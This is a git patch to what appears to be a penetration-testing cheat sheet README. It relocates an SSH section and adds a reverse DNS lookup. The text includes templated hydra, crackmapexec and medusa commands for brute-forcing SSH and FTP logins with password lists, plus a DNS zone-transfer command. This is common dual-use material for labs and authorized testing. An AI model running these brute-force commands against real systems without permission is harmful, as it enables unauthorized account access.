From 422c740a5ee1b281e40ad336664e75af6ec51f64 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Tue, 17 Jan 2023 12:13:43 -0500
Subject: [PATCH] Update README.md
---
README.md | 66 +++++++++++++++++++++++++++++--------------------------
1 file changed, 35 insertions(+), 31 deletions(-)
diff --git a/README.md b/README.md
index d1ab8fd..d3b09ab 100644
--- a/README.md
+++ b/README.md
@@ -179,6 +179,38 @@ medusa -h {RHOST} -u {user} -P /usr/share/wordlists/rockyou.txt -M ftp -t 10
+
+## SSH [22]
+
+
+
+```bash
+# SSH Connect
+ssh {USER}@{RHOST}
+
+# With Private Key
+ssh {USER}@{RHOST} -i {PKEY.ssh}
+
+# Remote file copy
+scp {USER}@{RHOST}:{file.ext} .
+scp {/path/to/source/file.ext} {USER}@{RHOST}:{/path/to/destination}
+
+# Directory
+scp -r {/path/to/source/dir} {USER}@{RHOST}:{/path/to/destination}
+
+# SSH Brute Force
+hydra -f -l {USER} -P {pass.txt} ssh://{RHOST}
+hydra -f -t 16 -L {user.txt} -P {pass.txt} ssh://{RHOST}
+
+crackmapexec ssh {RHOST} -u {user.txt} -p {pass.txt}
+
+# sign_and_send_pubkey: no mutual signature supported
+-oPubkeyAcceptedKeyTypes=+ssh-rsa
+-oKexAlgorithms=+diffie-hellman-group-exchange-sha1
+```
+
+
+
## SMTP [25]
@@ -211,37 +243,6 @@ Quit
-
-
-## SSH [22]
-
-
-
-```bash
-# SSH Connect
-ssh {USER}@{RHOST}
-
-# With Private Key
-ssh {USER}@{RHOST} -i {PKEY.ssh}
-
-# Remote file copy
-scp {USER}@{RHOST}:{file.ext} .
-scp {/path/to/source/file.ext} {USER}@{RHOST}:{/path/to/destination}
-
-# Directory
-scp -r {/path/to/source/dir} {USER}@{RHOST}:{/path/to/destination}
-
-# SSH Brute Force
-hydra -f -l {USER} -P {pass.txt} ssh://{RHOST}
-hydra -f -t 16 -L {user.txt} -P {pass.txt} ssh://{RHOST}
-
-crackmapexec ssh {RHOST} -u {user.txt} -p {pass.txt}
-
-# sign_and_send_pubkey: no mutual signature supported
--oPubkeyAcceptedKeyTypes=+ssh-rsa
--oKexAlgorithms=+diffie-hellman-group-exchange-sha1
-```
-
## DNS [53]
@@ -250,6 +251,9 @@ crackmapexec ssh {RHOST} -u {user.txt} -p {pass.txt}
# DNS Zone Transfer using dig
dig axfr @{RHOST} {DOMAIN}
+# Reverse DNS Lookup
+dig @{RHOST} -x {RHOST}
+
#DNSRecon
dnsrecon -d {DOMAIN} -t axfr